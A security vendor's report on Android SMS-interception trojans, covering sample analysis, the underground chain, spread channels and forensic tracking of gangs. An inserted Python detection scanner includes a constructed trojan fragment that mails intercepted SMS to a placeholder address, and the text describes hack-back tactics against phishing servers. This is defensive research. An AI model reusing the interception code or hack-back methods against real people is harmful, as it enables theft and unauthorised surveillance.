Academy of Cheetah Sciences. 2015/09/10 14:04

0x00 Introduction


According to cloud monitoring data from Cheetah Security Laboratory, the number of "SMS interception" sample variants intercepted in the past month exceeded 100,000, affecting millions of users. The "SMS interception" Trojan is one of the most common types of Android malware; it has shown a growing trend over the past two years, and the underground industry chain behind it has grown with it. The "SMS interception Trojan" has become a focal security issue for mobile payment, online banking assets and similar areas.

News of online banking funds stolen through the "SMS interception Trojan" is reported frequently. As a security vendor we are deeply troubled by what the victims go through, and this has pushed us to invest more effort in detecting and fighting the "SMS interception Trojan". In the course of this work we have gained some understanding of how the underground operation behind the Trojan works, and have made some attempts at tracking the gangs and collecting evidence. Below we share some of the experience and thinking gathered in this process, in the hope that users can learn more about this kind of security risk and guard against it, and that the security community will pay more attention to the problem.

0x01 Typical Sample Analysis


Technically, a typical SMS interception Trojan is not complicated in either principle or implementation: it monitors the sending and receiving of SMS messages either through a BroadcastReceiver or through the observer pattern (ContentObserver). There are also more comprehensive and powerful remote-control Trojans for which SMS interception is just one feature. Source code for similar SMS interceptors is plentiful online, and anyone familiar with Android development can quickly write an "SMS interception Trojan"; this is an important reason why the family mutates and spreads so quickly.

One "SMS Trojan" variant has been very active in our recent cloud monitoring, accounting for about 15% of total sample volume. This sample uses the string "Stalker" as the encryption key for its configuration information, so we named it "Stalker". Let us take it as an example for a brief technical analysis of a typical "SMS interception Trojan".

The figure above shows the typical functional structure of an "SMS interception Trojan". Our analysis of the "Stalker" sample also turned up some interesting details:

  1. For compatibility, the Trojan uses both the broadcast mechanism and the observer pattern to intercept SMS messages. The authorization-time check performed when the Trojan starts also shows that the author developed this variant for sale to others.

  2. When forwarding some SMS messages to the control phone, the Trojan filters and replaces sensitive keywords to evade monitoring and interception by mobile security software.

0x02 Black industry chain structure


As shown in the figure below, the division of labor in the "interception Trojan" underground industry chain is relatively clear. Trojan authoring, distribution and spreading, selling the intercepted data ("material"), cashing out ("washing") that material, and money transfer and laundering are the key links of the chain; among them, the "material owners" who hold large amounts of "interception material" occupy a relatively central position in the whole chain.

In actual operation, however, the whole ecosystem is considerably more complex. Besides the major roles above, other underground actors take part at each link of the chain: sellers of stolen personal information, dealers in "black" cards, maintainers of phishing back ends, Trojan anti-detection (AV evasion) services, and even overseas money-laundering organizations. The underground is also full of fraud among its own members, and "black material" scams have become the norm, while the gangs with real technical strength are the ones that reap the windfall. Some gangs with strong technology and resources may occupy many or even all links of the chain, and their illicit profits are naturally the highest.

0x03 Transmission Channel


As the "SMS interception" underground industry chain has developed, its low technical threshold and high returns have attracted large numbers of underground practitioners of all kinds. The channels for spreading the interception Trojan have become increasingly varied, and new phishing tricks emerge in an endless stream: mass sending from fake base stations, SMS modems and other hardware devices, luring through pornographic phishing websites, and distribution through miscellaneous third-party app channels are all involved.

We extracted keywords from the file names and the phishing SMS text used to spread 2,000 recently intercepted active "SMS interception Trojan" samples; the results are shown in the figure below. Phishing lures built around words such as "photo album" and "documents" account for more than half. Keywords of this kind are generally used for viral spread via the victim's address book (group sends to contacts), and their interception volume is relatively high. Next comes fake base station phishing, with common themes such as 10086 points exchange and bank upgrades. There are also phishing attacks aimed at specific groups, such as vehicle violation notices, campus passes and transcripts, which are usually enabled by leaked data on vehicle owners or parents. Finally, some spread by riding on social hot topics, such as the "Uniqlo" incident that was very popular some time ago.

As shown in the figure below, the change in transmission channels also reveals an important trend: from the early brute-force "cast a wide net" approach to targeted, precision phishing. In particular, the leakage of personal data has become increasingly active in recent years and is now a major accomplice in the targeted spread of the interception Trojan. Underground gangs buy personal data of high target value, such as records of commercial loan, credit card and online shopping users, and then carefully construct phishing messages to fit each person's situation. Because the SMS contains the user's name, ID number, bank card number or other personal data, and its content matches the user's recent business, recipients often relax their guard and are caught. Another example is the "backpackers" who carry fake base station equipment and mass-send phishing messages, mainly in large shopping malls, high-end office buildings and other areas where foot traffic is high and, more importantly, the people present have a higher "economic value".

0x04 Material washing channel


Underground gangs can smoothly transfer funds out of users' bank cards for two reasons. On the one hand, users' online banking information has leaked and their phones are under the Trojan's control. On the other hand, and importantly, the many chaotic payment channels in China lack effective security supervision, and their risk control has more or less some loopholes. Take a "material washing channel" case we followed up last year as an example: the payment channel of a third-party platform in Beijing was exploited by underground gangs, and thousands of users were victimized in just a few months, with individual losses ranging from dozens to tens of thousands.

Gangs have many ways to "wash" intercepted material, and transfer limits differ between "washing channels". They usually move funds out of users' cards through various quick-payment channels offered by banks, merchants or third-party payment providers. According to consumption records traced for some victims, the flow of funds is also varied, including purchases of game coins, lottery tickets, phone top-ups, air tickets and many other washing methods. Some users whose credit card CVV codes leaked also found their money spent through overseas consumption channels. Some infected phones may also be subscribed to malicious billing services or used to buy game cards that are then resold.

More and more authentication bindings and security verifications have moved to the user's mobile phone, and the smartphone now plays the role of a personal information center far beyond basic communication. On the one hand this brings a great deal of convenience; on the other hand, in the specific scenario of an infected phone, the user's security line often turns out to be fragile. While preserving the convenience of mobile payment, we need more secure and reliable authentication methods, such as fingerprint authentication. The security confrontation may never end, but we believe we can do better in the future.

0x05 Tracing Evidence Collection Case


In two years of security confrontation with the "SMS interception Trojan" we have been in contact with many victims. The amounts stolen run into the hundreds of thousands, and for most victims the final outcome is that responsibility is passed around between parties and it is difficult to file a case and trace the evidence. Leaving aside the external factors, there are genuine difficulties in gathering evidence for this kind of cybercrime. Taking the "SMS interception Trojan" as an example:

  1. The relationships between the links of the underground chain are interwoven and complex, and a batch of "intercepted material" is often sold and changes hands many times before it is washed;
  2. The back-end servers used to host phishing websites or receive control commands mostly run on foreign hosts;
  3. The mobile phone cards used for command and control are basically anonymous cards, which makes tracking and locating them relatively difficult;
  4. Stolen money is usually split many times before being cashed out, and is basically transferred through "black" cards, which complicates tracing the flow of funds.

As a security company, of course, we also have our own advantages in this confrontation. Against this kind of SMS fraud, phishing sites and fast-spreading "SMS interception Trojan" variants, we have optimized our security identification mechanisms and strengthened our cloud capabilities so that we can respond and block faster, preventing the harm from spreading further to users. On the other hand, by summarizing and analyzing the intercepted data from these scattered online banking phishing attacks and mobile Trojan transmissions, we can sort out the highly active underground groups in various regions of the country and then carry out more targeted monitoring, tracking and evidence collection.

[1] Fake base station SMS phishing case

Fake base station SMS phishing is a very important transmission channel for the "SMS interception Trojan". Looking at it from the side of intercepting fake base station phishing websites, cloud data show that since the second half of 2014 fake base station SMS phishing has entered an unusually active period, with nearly a thousand new phishing websites added on average each day at its peak. The security threat and reach of the "SMS interception Trojan" far exceed those of other types of mobile malware: when a gang holds both a user's bank card information and the verification phone, the user's online banking assets are completely at its mercy, like "fish on the chopping block".

We classified the active phishing sites and tested their security, and also analyzed fake base station phishing site source code collected from other sources. We found several classes of security holes, including unauthorized access to the back end, SQL injection and stored XSS. Because most of these common fake base station phishing sites are developed from a few fixed templates, these vulnerabilities are widespread. They are relatively simple and have already been disclosed this year on public security platforms, so there is no need to repeat the technical details.

Highly active fake base station phishing sites are automatically added to our forensics system, and by making automated batch use of the above vulnerabilities we can monitor active underground groups across the country over the long term. Based on analysis of victim distribution and of the login IPs of the phishing back ends, we have gained a deeper understanding of the scale and operation of China's fake base station phishing underground.

  1. There are many victims in China. More than 400,000 online banking records were found in the back-end records of hundreds of phishing websites, including name, ID number, issuing bank, bank card number, withdrawal password, CVV code and so on. Through tracking and comparison, these active phishing back ends gained more than 300 new records a day on average, some even up to thousands.
  2. Both the underground groups and the victims show regional clustering. The gangs are concentrated in Guangdong, Fujian, Hainan, Guangxi and other regions, which account for more than 80%; victims are mostly distributed in Guangdong, Hunan, Hubei and Henan, accounting for more than 60%.

Since the second half of 2014 we have strengthened monitoring of the "fake base station phishing" transmission channel, screened out more than 20 highly active gangs, and fed some of the evidence and tracking information back to police in many places across the country to assist in cracking down on them. At present some of the gangs involved have been arrested, with the amounts involved at least at the million level. We hope that more victims can recover their stolen funds once the cases are closed.

[2] "SMS interception Trojan" forensics case

As mentioned at the beginning of this article, the interception volume of "SMS interception Trojan" sample variants has risen rapidly over the past two years. A large number of these samples use email to receive intercepted messages and use mobile SMS for remote control, and these characteristics can serve as a common starting point for tracing evidence. Of course, some samples use web applications for message management; in our actual testing we also found many kinds of security vulnerabilities in them that can be used to assist automated forensics. On the other hand, based on the characteristics and transmission scenarios of the "SMS interception Trojan", we also tried a "reverse phishing" approach. Later we will discuss how the "reverse phishing" method can be used to track down the underground gangs.

Our security monitoring system unpacks and analyzes the "SMS interception" samples stored in the database and, using auxiliary features, automatically extracts the email account and password and the control phone number used by the gangs from the decompiled code. We also strengthen follow-up monitoring and tracking of the variants with the largest interception volumes.
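As an added example (not code from the original article or from Cheetah's own systems), the Python below runs the kind of static indicator scan described here, and also covers the two interception paths from the sample analysis section (BroadcastReceiver and ContentObserver). The decompiler-style fragment, its package name, mailbox, password and control number are all constructed placeholders.

```python
import re

# Constructed, decompiler-style fragment standing in for an unpacked sample.
# The package name, mailbox, password and control number are placeholders.
DECOMPILED = """
package com.example.placeholder;
public class SmsReceiver extends BroadcastReceiver {
  public void onReceive(Context c, Intent i) {
    Object[] pdus = (Object[]) i.getExtras().get("pdus");
    SmsMessage m = SmsMessage.createFromPdu((byte[]) pdus[0]);
    String body = m.getMessageBody();
    if (body.contains("verification")) { abortBroadcast(); }
    Mailer.send("mailbox-placeholder@example.com", "password-placeholder", body);
  }
}
public class SmsObserver extends ContentObserver {
  Uri u = Uri.parse("content://sms");
  String ctrl = "13800000000";
}
"""

# Static indicators grouped by the two interception paths the article
# describes (broadcast receiver, content observer) plus mail exfiltration.
INDICATORS = {
    "sms_receiver": r"extends\s+BroadcastReceiver",
    "pdu_parse":    r"SmsMessage\.createFromPdu|getMessageBody\s*\(",
    "abort_bcast":  r"abortBroadcast\s*\(",   # hides the SMS from other apps
    "sms_observer": r"extends\s+ContentObserver",
    "sms_uri":      r"content://sms",
    "mail_exfil":   r"javax\.mail|Mailer\.send|[Ss]mtp",
}
EMAIL_RE = re.compile(r"[\w.+-]+@[\w-]+\.[\w.-]+")
# Mainland China mobile numbers: 11 digits starting 13-19, not inside a longer run.
CN_MOBILE_RE = re.compile(r"(?<!\d)1[3-9]\d{9}(?!\d)")

def scan(source):
    """Return which interception indicators appear in the decompiled text."""
    return {name: bool(re.search(rx, source)) for name, rx in INDICATORS.items()}

def extract_controls(source):
    """Pull candidate mail accounts and control phone numbers for follow-up."""
    return {"emails": sorted(set(EMAIL_RE.findall(source))),
            "phones": sorted(set(CN_MOBILE_RE.findall(source)))}

def classify(source):
    """Flag a sample when an interception path is paired with an exfil channel."""
    hits = scan(source)
    controls = extract_controls(source)
    intercepts = (hits["sms_receiver"] and hits["pdu_parse"]) or \
                 (hits["sms_observer"] and hits["sms_uri"])
    exfiltrates = hits["mail_exfil"] or bool(controls["phones"])
    return {"suspect": bool(intercepts and exfiltrates),
            "hits": hits, "controls": controls}
```

For a sample like "Stalker", whose configuration is encrypted, the credential patterns only fire after the strings have been decrypted, while the mechanism indicators still match the decompiled code directly.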

On the other hand, given the special transmission scenario of the "SMS interception Trojan", we can pose as the victim and use the email account password or back-end interface found in the sample to deliver a carefully constructed "reverse phishing" bait to the gang, inducing them to open a phishing link so that we obtain their IP address. We went even further by inducing them to install our phishing app and then using GPS positioning, front-camera photography and other features to obtain more forensic information.

The idea behind "reverse phishing" forensics is not complex. The key is that the "bait" SMS must arouse the target's interest without being so abrupt that it puts the target on alert; it is best to blend it with some genuine SMS content so that truth and falsehood are mixed together. On the other hand, the target's attention is mostly on finding more valuable information in the users' messages, so they tend to ignore the authenticity of the "bait". This psychological characteristic is also an important factor in the success of the "reverse phishing" method.

0x06 More thinking


This article has analyzed and summarized the underground industry chain behind the "SMS interception Trojan" from several angles: typical samples, the underground chain, tracking and evidence collection, and so on. It can be seen that the formation and operation of this underground industry is a complex and interlaced product; our understanding of it is probably still partial, and there are far more hidden secrets than this article can reveal. Beyond detection and blocking by security vendors, the security confrontation around the "SMS interception Trojan" also involves mobile network security, mobile operating system security, bank risk control of funds, criminal enforcement and other links. To better protect users' online assets, we need to do more than we do now and think further ahead.

  1. As a security vendor, besides improving the identification mechanisms for "SMS interception Trojan" samples, phishing websites and other threats and improving response speed and detection, blocking and removal rates, we should move from passive defense to active countermeasures, relying on our own advantages in data analysis and security technology to raise the confrontation to a higher level. On the other hand, for other victims discovered through forensic monitoring, security warnings can be issued in advance through appropriate channels to avoid further losses.
  2. Many users are deceived because the sender of the phishing SMS is displayed as a normal number such as 10086 or 95588, which causes them to relax their guard. Providing a safe and reliable network environment should be a basic responsibility and obligation of carriers: operators need to strengthen monitoring of fake base stations and help more users upgrade to the more secure 4G networks, reducing their exposure to fake base station interference;
  3. Major banks and payment platforms need to strengthen supervision of their own payment and transfer channels, improve the risk-control mechanisms for funds transfers and other sensitive user operations, and prevent criminals from stealing users' online banking assets.
  4. For mobile phone manufacturers, security protection is also a key link in the development and design of mobile ROMs. Manufacturers can strengthen access control of sensitive permissions from the bottom of the system, especially for contacts, SMS records and other information related to user privacy, so as to provide better protection and prompts.